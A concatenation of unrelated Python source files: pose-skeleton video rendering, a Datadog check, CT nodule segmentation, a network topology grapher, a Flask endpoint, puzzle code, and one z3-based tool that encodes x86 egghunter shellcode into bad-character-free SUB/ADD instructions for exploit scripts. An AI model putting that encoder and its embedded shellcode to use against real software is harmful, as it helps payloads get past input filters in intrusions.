            x1, y1, _ = (np.array(pose[5]) + np.array(pose[6])) / 2 #neck
        else:
            x1, y1, _ = pose[limb[0]]
        x2, y2, _ = pose[limb[1]]
        line = gz.polyline(points=[(x1,y1), (x2,y2)], stroke_width = 6, stroke=line_color[line_cnt])
#        print('line', line_cnt)
        line_cnt += 1
        line.draw(surface)
    # Joints drawn after limbs so the dots sit on top.
    for idx in range(len(pose)):
#        print(idx)
        x1, y1,_ = pose[idx]
        joint = gz.circle(4, xy=[x1,y1], fill=(0,0,0))
        joint.draw(surface)
    show_img(surface.get_npimage(), label)
def make_frame_clean(data, save_video=True, joints=17,output_filename="../test.mp4",fps=30):
    """Render cleaned pose sequences (no per-frame ids) into a video.

    :param data: ndarray of per-frame (x, y) joints, or list of dicts with a
        flat 'keypoints' list. Joint groups must unpack as (x, y) here.
    :param save_video: when True, write the rendered frames with moviepy.
    :param joints: 17/18 use the 17-joint tables; 26 uses the Halpe tables.
        NOTE(review): other values leave l_pair unbound -> UnboundLocalError.
    :param output_filename: output video path (mpeg4 codec).
    :param fps: frames per second of the output clip.
    """
    width = 640
    height = 360
    print("make! fps:",fps, len(data))
    arr = True if isinstance(data, np.ndarray) else False
    result = []
#    BODY_17_GRAPH = build_graph(BODY_17_LINES)
    cur_idx = -1
    for frame in data:
#        print(cur_idx, frame['image_id'])
        surface = gz.Surface(width=width, height=height, bg_color=(1,1,1))
        cur_idx += 1
        if arr:
            pose = frame.tolist()
        else:
            n_group = int(len(frame['keypoints']) / joints)
            pose = list(grouper(frame["keypoints"], n_group))
        line_cnt = 0
        # Pick limb table and palettes for the skeleton layout.
        if joints==17 or joints == 18:
            l_pair = l_pair_17
            line_color = line_color_17
            p_color = p_color_17
        elif joints == 26:
            l_pair = l_pair_26
            line_color = line_color_26
            p_color = p_color_26
        for limb in l_pair:
            # Index == joints is the synthetic neck: shoulder midpoint.
            if limb[0] == joints and joints == 17:
                x1, y1 = (np.array(pose[5]) + np.array(pose[6])) / 2 #neck
            else:
                x1, y1 = pose[limb[0]]
            x2, y2 = pose[limb[1]]
            line = gz.polyline(points=[(x1,y1), (x2,y2)], stroke_width = 6, stroke=line_color[line_cnt])
#            print('line', line_cnt)
            line_cnt += 1
            line.draw(surface)
        # Joints drawn after limbs so the dots sit on top.
        for idx in range(len(pose)):
#            print(idx)
            x1, y1 = pose[idx]
            joint = gz.circle(4, xy=[x1,y1], fill=(0,0,0))
            joint.draw(surface)
        result.append(surface.get_npimage())
    if save_video:
        clip = mpy.ImageSequenceClip(result, fps=fps)
        clip.write_videofile(output_filename, fps=fps, codec='mpeg4')
# =============================================================================
# TODO: multi-person
# =============================================================================
def make_frame(data, save_video=True, joints=17,output_filename="../test.mp4"):
    """Render raw AlphaPose results (with per-frame 'image_id') into a video.

    Deduplicates frames sharing the same image_id and inserts blank frames
    for gaps in the id sequence. Joint groups must unpack as (x, y, score).

    :param data: list of detection dicts with 'image_id' ("<n>.jpg") and a
        flat 'keypoints' list.
    :param save_video: when True, write the rendered frames with moviepy.
    :param joints: 17/18 use the 17-joint tables; 26 uses the Halpe tables.
        NOTE(review): other values leave l_pair unbound -> UnboundLocalError.
    :param output_filename: output video path (mpeg4 codec, 30 fps).
    """
    width = 720
    height = 540
    result = []
#    BODY_17_GRAPH = build_graph(BODY_17_LINES)
    cur_idx = -1
    for frame in data:
        frame_idx = int(frame['image_id'].split('.')[0])
#        print(cur_idx, frame['image_id'])
        if frame_idx == cur_idx: #same frame
            # Extra detection for an already-rendered frame (multi-person
            # results): only the first person per frame is drawn.
#            print('cont', cur_idx)
            continue
        surface = gz.Surface(width=width, height=height, bg_color=(1,1,1))
        if (frame_idx - cur_idx) > 1: #missing frame
            # Gap in the id sequence: emit one blank frame and resync.
            # NOTE(review): the sleep looks like leftover debugging -- confirm.
#            print('missing frame')
            time.sleep(0.5)
            #missing += (frame_idx - cur_idx -1)
            cur_idx += (frame_idx - cur_idx)
            result.append(surface.get_npimage())
            continue
        cur_idx += 1
        n_group = int(len(frame['keypoints']) / joints)
        pose = list(grouper(frame["keypoints"], n_group))
        line_cnt = 0
        # Pick limb table and palettes for the skeleton layout.
        if joints==17 or joints == 18:
            l_pair = l_pair_17
            line_color = line_color_17
            p_color = p_color_17
        elif joints == 26:
            l_pair = l_pair_26
            line_color = line_color_26
            p_color = p_color_26
        for limb in l_pair:
            # Index == joints is the synthetic neck: shoulder midpoint.
            if limb[0] == joints and joints == 17:
                x1, y1, c1 = (np.array(pose[5]) + np.array(pose[6])) / 2 #neck
            else:
                x1, y1, c1 = pose[limb[0]]
            x2, y2, c2 = pose[limb[1]]
            line = gz.polyline(points=[(x1,y1), (x2,y2)], stroke_width = 3, stroke=line_color[line_cnt])
#            print('line', line_cnt)
            line_cnt += 1
            line.draw(surface)
        # Joints drawn after limbs so the dots sit on top.
        for idx in range(len(pose)):
#            print(idx)
            x1, y1, c1 = pose[idx]
            joint = gz.circle(3, xy=[x1,y1], fill=(0,0,0))
            joint.draw(surface)
#
#            for g_idx in BODY_17_GRAPH.get(idx, set()):
#
#                if g_idx == 17:
#                    x2, y2, c2 = (np.array(pose[5]) + np.array(pose[6])) / 2 #neck
#                    joint = gz.circle(3, xy=[x2,y2], fill=p_color[g_idx])
#                    joint.draw(surface)
#                else:
#                    x2, y2, c2 = pose[g_idx]
#                c = min(c1, c2)
#
##                if c == 0:
##                    continue
#                line = gz.polyline(
#                    points=[(x1, y1), (x2, y2)], stroke_width=5 * c,
#                    stroke=line_color[line_cnt]
#                )
#                print('color ',line_cnt, line_color[line_cnt])
#                line_cnt += 1
#                line.draw(surface)
        result.append(surface.get_npimage())
    if save_video:
        clip = mpy.ImageSequenceClip(result, fps=30)
        clip.write_videofile(output_filename, fps=30, codec='mpeg4')
    #clip.ipython_display(fps=30)
#    return result
def getTime(time1=0):
    """Return the current time, or (current time, elapsed) when *time1* is set.

    :param time1: an earlier time.time() value, or 0/falsy to just get now.
    :return: time.time() when time1 is falsy; otherwise the tuple
        (time.time(), seconds elapsed since time1).
    """
    if time1:
        elapsed = time.time() - time1
        return time.time(), elapsed
    return time.time()
#filename = 'output_fast/alphapose-results-fast-29_Trim.json'
#filename = 'output_halpe26/alphapose-results-halpe26-29_Trim.json'
#with open(filename,'r') as of:
# data = json.load(of)
from PIL import Image
#r = make_frame(data[:1200],joints=17)
#r = make_frame(data,joints=26, output_filename="../test29_2.mp4")
def show_img(arr, idx=0):
    """Save the image array *arr* to testframes/clean/<idx>.jpg.

    :param arr: numpy image array accepted by PIL.Image.fromarray.
    :param idx: frame index used as the output filename.
    """
    frame = Image.fromarray(arr)
    frame.save(f'testframes/clean/{idx}.jpg')
|
import requests
# the following try/except block will make the custom check compatible with any Agent version
try:
# first, try to import the base class from old versions of the Agent...
from checks import AgentCheck
except ImportError:
# ...if the above failed, the check is running in Agent version 6 or later
from datadog_checks.checks import AgentCheck
# content of the special variable __version__ will be shown in the Agent status page
__version__ = "1.0.0"
class WeatherTempCheck(AgentCheck):
    """Datadog custom check that reports London weather from OpenWeatherMap."""

    def check(self, instance):
        """Fetch current London weather and emit temp/humidity/clouds gauges.

        :param instance: check instance config (unused; the API key should
            ideally be read from here instead of being hard-coded).
        """
        # BUG FIX: the original line had unbalanced quotes around
        # YOUR_API_KEY ('...appid='YOUR_API_KEY') -> SyntaxError. Replace
        # YOUR_API_KEY with a real OpenWeatherMap key.
        url = ('https://api.openweathermap.org/data/2.5/weather'
               '?q=London,uk&units=metric&appid=YOUR_API_KEY')
        res = requests.get(url)
        data = res.json()
        temp = data['main']['temp']
        humidity = data['main']['humidity']
        clouds = data['clouds']['all']
        self.gauge('weather.temp', temp, tags=['location:london'])
        self.gauge('weather.humidity', humidity, tags=['location:london'])
        self.gauge('weather.clouds', clouds, tags=['location:london'])
|
def permutations(xs):
    """Return every permutation of list *xs*, in first-pick order.

    BUG FIX: the original removed elements by value (`i != x`), which
    discarded ALL duplicates of the chosen element at once and produced
    wrong/missing permutations for inputs with repeated values
    (e.g. [1, 1] yielded [[1], [1]]). Removing by index fixes that while
    keeping the original output order for distinct elements.

    :param xs: list of (possibly repeated) elements.
    :return: list of permutations, each a new list; [[]] for empty input.
    """
    if not xs:
        return [[]]
    return [[x] + rest
            for i, x in enumerate(xs)
            for rest in permutations(xs[:i] + xs[i + 1:])]
print(permutations([1,2,3]))
|
import cv2
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from SUMNet_bn import SUMNet
import SimpleITK as sitk
import matplotlib.pyplot as plt
import pandas as pd
from glob import glob
from torchvision import transforms
def load_itk_image(filename):
    """Load a medical image file via SimpleITK.

    :param filename: path to the image (e.g. a .mhd file).
    :return: (voxel array, origin, spacing); origin and spacing are numpy
        arrays with their components reversed relative to ITK's native order.
    """
    itk_image = sitk.ReadImage(filename)
    voxels = sitk.GetArrayFromImage(itk_image)
    origin = np.array(list(reversed(itk_image.GetOrigin())))
    spacing = np.array(list(reversed(itk_image.GetSpacing())))
    return voxels, origin, spacing
def get_filename(case):
    """Return the first path in the module-global file_list containing *case*.

    NOTE(review): file_list is never defined in this script -- confirm it is
    meant to be injected (or that this helper is dead code) before relying on it.
    """
    global file_list
    for candidate in file_list:
        if case in candidate:
            return candidate
# Paths to the LUNA16 subset, the output directory and one scan to segment.
luna_subset_path = '/home/siplab/rachana/rak/dataset/subset3/'
result_path = '/home/siplab/rachana/rak/img_results/'
img_file = '/home/siplab/rachana/rak/dataset/subset3/1.3.6.1.4.1.14519.5.2.1.6279.6001.244681063194071446501270815660.mhd'
# Load the CT volume as a (slices, 1, H, W) float tensor.
itk_img = sitk.ReadImage(img_file)
img_tensor = torch.from_numpy(sitk.GetArrayFromImage(itk_img)).unsqueeze(1).float()
# Restore the trained SUMNet segmentation weights.
seg_model_loadPath = '/home/siplab/rachana/rak/Results/SUMNet/Adam_1e-4_ep100/'
netS = SUMNet(in_ch=1,out_ch=2)
netS.load_state_dict(torch.load(seg_model_loadPath+'sumnet_best.pt'))
# Intensity normalization; constants presumably dataset HU statistics -- TODO confirm.
apply_norm = transforms.Normalize([-460.466],[444.421])
# Examine ten slices around the middle of the volume.
N = int(img_tensor.shape[0]*0.5)
for sliceNum in range(N-5,N+5):
    img_slice = img_tensor[sliceNum]
    # Replace extreme (out-of-scan) intensities with the central-region mean.
    mid_mean = img_slice[:,100:400,100:400].mean()
    img_slice[img_slice==img_slice.min()] = mid_mean
    img_slice[img_slice==img_slice.max()] = mid_mean
    img_slice_norm = apply_norm(img_slice).unsqueeze(0)
    # Forward pass; channel 1 is taken as the foreground probability map.
    out = F.softmax(netS(img_slice_norm),dim=1)
    out_np = np.asarray(out[0,1].squeeze(0).detach().cpu().numpy()*255,dtype=np.uint8)
    # Otsu-threshold the probabilities and find connected components.
    ret, thresh = cv2.threshold(out_np,0,1,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
    connectivity = 4
    output = cv2.connectedComponentsWithStats(thresh, connectivity, cv2.CV_32S)
    stats = output[2]
    # Component 0 is background; keep the largest foreground component.
    temp = stats[1:, cv2.CC_STAT_AREA]
    if len(temp)>0:
        largest_label = 1 + np.argmax(temp)
        areas = stats[1:, cv2.CC_STAT_AREA]
        max_area = np.max(areas)
        # Only report components above an area threshold (150 px).
        if max_area>150:
            print('Slice:',sliceNum+1)
            out_mask = np.zeros((512,512))
            idx = np.where(output[1]==largest_label)
            out_mask[idx] = 1
            # Save a three-panel figure: input, soft output, largest region.
            plt.figure(figsize=[15,5])
            plt.subplot(131)
            plt.imshow(img_slice.squeeze(0).squeeze(0).numpy(),cmap='gray')
            plt.title('Original image')
            plt.subplot(132)
            plt.imshow(out[0,1].squeeze(0).detach().numpy(),cmap='gray')
            plt.title('Segmented regions')
            plt.subplot(133)
            plt.imshow(out_mask,cmap='gray')
            plt.title('Detected largest nodule')
            plt.savefig(result_path+'slice_'+str(sliceNum+1)+'.png')
            plt.close()
|
#!/usr/bin/env python3
import os
import csv
import pygraphviz
def main():
    """Read graph.csv and render the network topology to topology.png.

    Each CSV row is: node hostname followed by repeated
    (remote hostname, local interface, remote interface) triples.
    Rows whose first cell contains "Node" are treated as headers.
    """
    nodes = {}
    # BUG FIX: the file handle was opened but never closed; use a context
    # manager so it is released even on parse errors.
    with open("graph.csv", "r") as graphfile:
        for row in csv.reader(graphfile):
            if "Node" in row[0]:
                continue  # header row
            nodes[row[0]] = Node(row[0])
            # Remaining columns come in triples starting at index 1.
            for i in range(1, len(row), 3):
                nodes[row[0]].add_remote(remotenode(row[i], row[i+1], row[i+2]))
    G = pygraphviz.AGraph(strict=False, directed=True)
    for node in nodes:
        for rnode in nodes[node].remote:
            if G.has_edge(rnode.hostname, nodes[node].hostname):
                # Reverse edge already present: mark the link bidirectional.
                G.get_edge(rnode.hostname, nodes[node].hostname).attr['dir'] = "both"
            else:
                label = '%s:%s' % (rnode.localinterface, rnode.remoteinterface)
                G.add_edge(nodes[node].hostname, rnode.hostname, label=label)
    G.layout(prog='dot')
    G.draw('topology.png', prog='dot')
class Node(object):
    """A local network device plus the remote endpoints discovered from it."""

    def __init__(self, hostname):
        super(Node, self).__init__()
        self.hostname = hostname   # device name
        self.remote = []           # list of remotenode entries

    def add_remote(self, remote_node):
        """Record one discovered neighbour (a remotenode instance)."""
        self.remote.append(remote_node)
class remotenode(object):
    """One neighbour link: remote hostname plus the interface pair joining it."""

    def __init__(self, hostname, localinterface, remoteinterface):
        super(remotenode, self).__init__()
        self.hostname = hostname                 # remote device name
        self.localinterface = localinterface     # interface on the local node
        self.remoteinterface = remoteinterface   # interface on the remote node
main()
|
from flask_restful import Resource
from json import load as json_load
import os
from data_operations.database.helpers import DB
class Endpoint(Resource):
    """Base flask-restful resource: loads JSON config and queries project DBs."""

    def __init__(self):
        # The config location depends on the working directory the app was
        # started from (repo root vs. inside 'carbon_black').
        if 'carbon_black' not in os.getcwd():
            config_path = './data_operations/config.json'
        else:
            config_path = '../data_operations/config.json'
        with open(config_path) as f:
            self.config = json_load(f)

    def query_db(self, db_name: str, query: str):
        """Run *query* against the named database.

        :return: list of result rows, or [] when the query fails (the error
            is printed, preserving the original best-effort behavior).
        """
        db = DB(db_name, False)
        try:
            return db.select(query)
        except Exception as err:
            print(err)
            return []

    # returns a list of tuples from sql execution
    def query(self, api_endpoint: str, query: str) -> list:
        """Run *query* against the database registered for *api_endpoint*.

        :return: list of row tuples; [] when no database matches the endpoint.
            (BUG FIX: previously returned None here, contradicting the
            `-> list` annotation and breaking iteration at call sites;
            also replaced `db == None` with the idiomatic `db is None`.)
        """
        db = None
        for data_item in self.config['nostradamus']:
            if data_item['api_endpoint'] == api_endpoint:
                db = DB(data_item['database_name'])
        if db is None:
            return []
        results = db.select(query)
        del db
        return results
|
#!/usr/bin/env python3
from z3 import *
import struct
# idea to use z3 taken from https://marcosvalle.github.io/re/exploit/2018/10/05/sub-encoding.html
# poc code expanded to fully encode all shellcode
def solve_zero_eax(good_chars):
    """Find two 32-bit AND masks X, Y built only from allowed bytes.

    Because X & Y == 0, the sequence `and eax, X; and eax, Y` always
    zeroes EAX regardless of its prior value.

    good_chars: string of bytes permitted in the encoded payload.
    Returns [X, Y] as ints.
    Raises ValueError if no such masks exist for this charset
    (fixed: the result of s.check() was previously ignored, and
    s.model() was recomputed for every extracted value).
    """
    x1 = Int('x1')
    x2 = Int('x2')
    x3 = Int('x3')
    x4 = Int('x4')
    y1 = Int('y1')
    y2 = Int('y2')
    y3 = Int('y3')
    y4 = Int('y4')
    X = BitVec('X', 32)
    Y = BitVec('Y', 32)
    s = Solver()
    # Masks with no set bit in common AND together to zero.
    s.add(X & Y == 0)
    # Decompose each mask into four byte "digits" (big-endian weights).
    s.add(0x1000000*x1 + 0x10000*x2 + 0x100*x3 + x4 == BV2Int(X))
    s.add(0x1000000*y1 + 0x10000*y2 + 0x100*y3 + y4 == BV2Int(Y))
    # Every byte of both masks must come from the allowed character set.
    for ci in [x1, x2, x3, x4, y1, y2, y3, y4]:
        s.add(Or([ci == ord(c) for c in good_chars]))
    if s.check() != sat:
        raise ValueError("no bad-char-free AND masks exist for this charset")
    m = s.model()
    return [m[X].as_long(), m[Y].as_long()]
def solve_sub_encode(b, good_chars):
    """Find three 32-bit constants X, Y, Z, all bytes from good_chars,
    with X + Y + Z == b modulo 2**32.

    Used to emit three `sub eax, imm32` instructions whose combined
    wraparound effect leaves the target value b in EAX.

    Returns [X, Y, Z] as ints.
    Raises ValueError if unsatisfiable (fixed: s.check() result was
    previously ignored and s.model() recomputed per value).
    """
    x1 = Int('x1')
    x2 = Int('x2')
    x3 = Int('x3')
    x4 = Int('x4')
    y1 = Int('y1')
    y2 = Int('y2')
    y3 = Int('y3')
    y4 = Int('y4')
    z1 = Int('z1')
    z2 = Int('z2')
    z3 = Int('z3')
    z4 = Int('z4')
    X = Int('X')
    Y = Int('Y')
    Z = Int('Z')
    s = Solver()
    # The three-term sum may carry once past 2**32.
    s.add(Or(X+Y+Z == b, X+Y+Z == 0x100000000 + b))
    # Each constant decomposes into four byte "digits" (big-endian weights).
    s.add(0x1000000*x1 + 0x10000*x2 + 0x100*x3 + x4 == X)
    s.add(0x1000000*y1 + 0x10000*y2 + 0x100*y3 + y4 == Y)
    s.add(0x1000000*z1 + 0x10000*z2 + 0x100*z3 + z4 == Z)
    # Every byte of every constant must be an allowed character.
    for ci in [x1, x2, x3, x4, y1, y2, y3, y4, z1, z2, z3, z4]:
        s.add(Or([ci == ord(c) for c in good_chars]))
    if s.check() != sat:
        raise ValueError("no SUB encoding for 0x%x with this charset" % b)
    m = s.model()
    return [m[X].as_long(), m[Y].as_long(), m[Z].as_long()]
def solve_add_encode(b, good_chars):
    """Find three 32-bit constants X, Y, Z, all bytes from good_chars,
    with X + Y + Z == b modulo 2**32.

    Used to emit three `add eax, imm32` instructions that build the
    target value b in EAX (starting from zero).

    NOTE: this is currently identical to solve_sub_encode — both solve
    "three allowed-byte constants summing to b mod 2**32"; they are kept
    as separate entry points for the two encoders.

    Returns [X, Y, Z] as ints.
    Raises ValueError if unsatisfiable (fixed: s.check() result was
    previously ignored and s.model() recomputed per value).
    """
    x1 = Int('x1')
    x2 = Int('x2')
    x3 = Int('x3')
    x4 = Int('x4')
    y1 = Int('y1')
    y2 = Int('y2')
    y3 = Int('y3')
    y4 = Int('y4')
    z1 = Int('z1')
    z2 = Int('z2')
    z3 = Int('z3')
    z4 = Int('z4')
    X = Int('X')
    Y = Int('Y')
    Z = Int('Z')
    s = Solver()
    # The three-term sum may carry once past 2**32.
    s.add(Or(X+Y+Z == b, X+Y+Z == 0x100000000 + b))
    s.add(0x1000000*x1 + 0x10000*x2 + 0x100*x3 + x4 == X)
    s.add(0x1000000*y1 + 0x10000*y2 + 0x100*y3 + y4 == Y)
    s.add(0x1000000*z1 + 0x10000*z2 + 0x100*z3 + z4 == Z)
    # Every byte of every constant must be an allowed character.
    for ci in [x1, x2, x3, x4, y1, y2, y3, y4, z1, z2, z3, z4]:
        s.add(Or([ci == ord(c) for c in good_chars]))
    if s.check() != sat:
        raise ValueError("no ADD encoding for 0x%x with this charset" % b)
    m = s.model()
    return [m[X].as_long(), m[Y].as_long(), m[Z].as_long()]
def do_sub_encoding(egghunter, good_chars):
    """Print Python source that rebuilds `egghunter` via SUB encoding.

    For each 4-byte block (already reversed by prep_shellcode), EAX is
    zeroed with two AND masks, the block's two's-complement negation is
    built with three `sub eax, imm32` instructions using only allowed
    bytes, and the result is pushed onto the stack.
    The output is meant to be pasted into an exploit script.
    """
    print("# BEGIN AUTOGENERATED ENCODED EGGHUNTER")
    res = solve_zero_eax(good_chars)
    # 25 is and eax, lv
    print("zero_eax =",b"\x25","+",struct.pack("<I", res[0]),"+",b"\x25","+",struct.pack("<I", res[1]))
    print("encoded_egg_hunter = b''")
    for instruction_block in egghunter:
        print(f"# SUB encoding instructions: {instruction_block.hex()}")
        i = struct.unpack("<I", instruction_block)[0]
        # Two's-complement negation: subtracting `neg` from zero yields `i`.
        neg = 0xFFFFFFFF - i + 1
        print("# 0xFFFFFFFF - 0x{:x} + 1 = 0x{:x}".format(i, neg)) #carry
        res = solve_sub_encode(neg, good_chars)
        print("encoded_egg_hunter += zero_eax")
        for b in res:
            # 2D is sub eax, lv
            print("#", hex(b))
            print("encoded_egg_hunter +=", b"\x2D", "+", struct.pack("<I", b))
        # push eax
        print("encoded_egg_hunter +=", b'\x50')
    print("# END AUTOGENERATED ENCODED EGGHUNTER")
def do_add_encoding(egghunter, good_chars):
    """Print Python source that rebuilds `egghunter` via ADD encoding.

    For each 4-byte block (already reversed by prep_shellcode), EAX is
    zeroed with two AND masks, the block value is built with three
    `add eax, imm32` instructions using only allowed bytes, and the
    result is pushed onto the stack.
    Fix: removed the unused local `check = 0`.
    """
    print("# BEGIN AUTOGENERATED ENCODED EGGHUNTER")
    res = solve_zero_eax(good_chars)
    # 25 is and eax, lv
    print("zero_eax =",b"\x25","+",struct.pack("<I", res[0]),"+",b"\x25","+",struct.pack("<I", res[1]))
    print("encoded_egg_hunter = b''")
    for instruction_block in egghunter:
        print(f"# ADD encoding instructions: {instruction_block.hex()}")
        i = struct.unpack("<I", instruction_block)[0]
        res = solve_add_encode(i, good_chars)
        print("encoded_egg_hunter += zero_eax")
        for b in res:
            print("#", hex(b))
            # 05 is add eax, lv
            print("encoded_egg_hunter +=", b"\x05", "+", struct.pack("<I", b))
        # push eax
        print("encoded_egg_hunter +=", b'\x50')
    print("# END AUTOGENERATED ENCODED EGGHUNTER")
def prep_shellcode(shellcode):
    """Split `shellcode` into 4-byte blocks, ordered last block first.

    The reversal matters because the encoder pushes each block onto the
    stack, which grows downward.
    """
    blocks = [shellcode[k:k + 4] for k in range(0, len(shellcode), 4)]
    return blocks[::-1]
# egghunter shellcode, can change this to whatever shellcode you want
shellcode = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# The encoder pushes one 4-byte block per round, so the payload length must
# be a multiple of 4; pad manually if needed.
if len(shellcode) % 4 != 0:
    print(f"Shellcode not divisible by 4, was {len(shellcode)} bytes, pad with 'nops'")
    exit()
egghunter = prep_shellcode(shellcode)
# good chars list, might have to change this
# Bytes allowed in the encoded payload; note the gaps (e.g. \x00, \x0a,
# \x0d, \x2e-\x2f, \x3a, \x3f-\x40) for the target's bad characters.
good_chars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13"
good_chars += "\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24"
good_chars += "\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x30\x31\x32\x33\x34\x35\x36"
good_chars += "\x37\x38\x39\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
good_chars += "\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b"
good_chars += "\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c"
good_chars += "\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d"
good_chars += "\x7e\x7f"
# Emit both variants; pick whichever encoding suits the target.
do_add_encoding(egghunter, good_chars)
do_sub_encoding(egghunter, good_chars)
|
class Solution:
    def wordBreak(self, s: str, wordDict: List[str]) -> bool:
        """Return True if `s` can be segmented into words from `wordDict`.

        Top-down memoized DP: go(i) answers "can s[i:] be segmented?".
        Improvements over the original: wordDict is converted to a set
        (O(1) membership instead of an O(len(wordDict)) list scan per
        substring), and the scan short-circuits on the first viable
        split instead of evaluating every j.
        """
        words = set(wordDict)

        @cache
        def go(i: int) -> bool:
            if i == len(s):
                return True
            return any(s[i:j] in words and go(j)
                       for j in range(i + 1, len(s) + 1))

        return go(0)
|
from pyparsing import oneOf, OneOrMore, Group, Word, nums, Suppress, pythonStyleComment, ParseException
import time
import os.path
class Checkpoint(object):
    """Sentinel entry in the history list; undo stops when it pops one."""
class AnswerError(Exception):
    """Raised when an entered answer conflicts with other cells or cage math.

    `cells` holds the coordinates of the offending cells so the UI can
    highlight them.
    """

    def __init__(self, cells):
        self.cells = cells
class CandidateError(Exception):
    """Raised when a toggled candidate clashes with an answer on its line.

    `cells` holds the coordinates of the conflicting cells so the UI can
    highlight them.
    """

    def __init__(self, cells):
        self.cells = cells
class Update(object):
    """Snapshot of one cell's state: coordinates, answer, candidate list.

    History entries and UI refresh lists are built from these.
    """

    def __init__(self, coords, ans, cand):
        self.coords = coords
        self.answer = ans
        self.candidates = cand
class Puzzle(object):
    """Model of a KenKen puzzle: cages, solution, user answers/candidates,
    and an undoable history of cell updates.

    Parses .ken (fresh puzzle) and .kip (saved in-progress) files via
    pyparsing, and supports answer entry with constraint propagation.

    Fixes applied: self.cages, self.cageID and self.oneCellCages were
    used in __init__ but never initialized (AttributeError on load);
    an unreachable duplicate `except ParseException` clause was removed;
    the local `type` no longer shadows the builtin; save() uses open()
    instead of the legacy file() builtin; ranges that are mutated as
    lists are wrapped in list() (same behavior, Python-3 safe).
    """
    def __init__(self, fin, parent):
        # fin will be passed to pyparsing. It must be an open file object
        def coords(idx):
            # utility function to convert list index to coordinates
            return (1+idx // dim, 1 + idx % dim)
        self.solution = {}
        self.history = []
        self.answer = {}
        self.candidates = {}
        self.cages = []         # all Cage objects in the puzzle
        self.cageID = {}        # cell coordinates -> owning Cage
        self.oneCellCages = []  # cells whose answer is given by the puzzle
        self.parent = parent
        # use pyparsing to parse input file
        try:
            # first assume that the file is in .ken format
            p = self.parseKen(fin)
            filetype = 'ken'
        except ParseException:
            # attempt parsing in .kip format; a second failure propagates
            fin.seek(0,0) # rewind
            p = self.parseKip(fin)
            filetype = 'kip'
        self.infile = fin.name
        self.isDirty = False
        self.dim = dim = int(p.dim)
        for i in range(1, dim+1):
            for j in range(1, dim+1):
                self.answer[(i,j)] = 0
                self.candidates[(i,j)] = []
        # Cells are numbered as (row, col), where 1 <= row, col <= dim
        for c in p.cages:
            cage = Cage( c.oper, int(c.value), c.cells, int(c.color) )
            self.cages.append(cage)
            for cell in cage:
                self.cageID[cell] = cage
            if len(c.cells) == 1:
                # Single-cell cage: its value is a given answer.
                cell = c.cells[0]
                x = int(cell[0])
                y = int(cell[1])
                self.oneCellCages.append( (x, y) )
                self.answer[(x, y)] = int(c.value)
        for idx, val in enumerate(p.soln):
            self.solution[coords(idx)] = int(val)
        if filetype == 'ken':
            return
        # input file is in .kip format: restore answers, candidates, history
        for idx, val in enumerate(p.answer):
            self.answer[coords(idx)] = int(val)
        for idx, val in enumerate(p.candidates):
            # '0' is the saved marker for "no candidates"
            self.candidates[coords(idx)] = [] if val == '0' else [int(c) for c in val]
        for h in p.history:
            if h == 'checkpoint':
                self.history.append(Checkpoint())
            else:
                x, y = int(h.coords[0]), int(h.coords[1])
                ans = int(h.answer)
                cand = [int(c) for c in h.candidates]
                if cand == [0]:
                    cand = []
                self.history.append(Update((x,y), ans, cand ))
        self.parent.control.setTime(int(p.time))
    def parseKen(self, fin):
        # parser for .ken files
        operator = oneOf("ADD SUB MUL DIV NONE")
        integer = Word(nums)
        lbrack = Suppress('[')
        rbrack = Suppress(']')
        cage = Group( operator("oper") + integer("value") +\
                      lbrack + OneOrMore(integer)("cells") + rbrack +\
                      integer("color") )
        cages = OneOrMore(cage)("cages")
        solution = "Solution" + OneOrMore(integer)("soln")
        dimension ="dim" + integer("dim")
        puzzle = dimension + cages + solution
        puzzle.ignore(pythonStyleComment)
        return puzzle.parseFile(fin, parseAll = True)
    def parseKip(self, fin):
        # parser for .kip files (a .ken plus answers, candidates,
        # history and elapsed time)
        operator = oneOf("ADD SUB MUL DIV NONE")
        integer = Word(nums)
        lbrack = Suppress('[')
        rbrack = Suppress(']')
        cage = Group( operator("oper") + integer("value") +\
                      lbrack + OneOrMore(integer)("cells") + rbrack +\
                      integer("color") )
        cages = OneOrMore(cage)("cages")
        update = Group( integer("coords") + integer("answer") +integer("candidates") )
        annal = "checkpoint" ^ update
        history = "History" + OneOrMore(annal)("history")
        dimension ="dim" + integer("dim")
        solution = "Solution" + OneOrMore(integer)("soln")
        answer = "Answers" + OneOrMore(integer)("answer")
        candidates = "Candidates" + OneOrMore(integer)("candidates")
        time = "Time" + integer("time")
        puzzle = dimension + cages + solution + answer + candidates + history + time
        puzzle.ignore(pythonStyleComment)
        return puzzle.parseFile(fin, parseAll = True)
    def enterAnswer(self, focus, value):
        # User enters an answer in a cell.
        # If the answer conflicts with a value already entered in another cell,
        # or this answer completes a cage, and the arithmetic is wrong,
        # raise AnswerError.
        # If the user is entering (or changing) an answer, compute all resulting
        # inferences, enter them in the history, and return a list of all cells
        # whose values change (whether answers or candidates.)
        # If the user is simply reentering the same answer in a cell, do nothing
        # and return an empty list of updates.
        history = self.history
        dim, answer = self.dim, self.answer
        if answer[focus] == value:
            return []
        # Collect every cell on the same row/column already holding value.
        row = [x for x in range(1, dim+1) if answer[(x, focus[1])] == value]
        col = [y for y in range(1, dim+1) if answer[(focus[0], y)] == value]
        cells = [(x, focus[1]) for x in row] + [(focus[0], y) for y in col]
        if cells:
            raise AnswerError(cells)
        cage = self.cageID[focus]
        # If this answer fills the cage's last empty cell, the cage
        # arithmetic must check out.
        if len([x for x in cage if x != focus and answer[x]]) == len(cage) - 1:
            if not self.goodAnswer(cage, focus, value):
                raise AnswerError(cage)
        self.isDirty = True
        history.append(Checkpoint())
        updates = self.propagate(focus, value)
        for upd in updates:
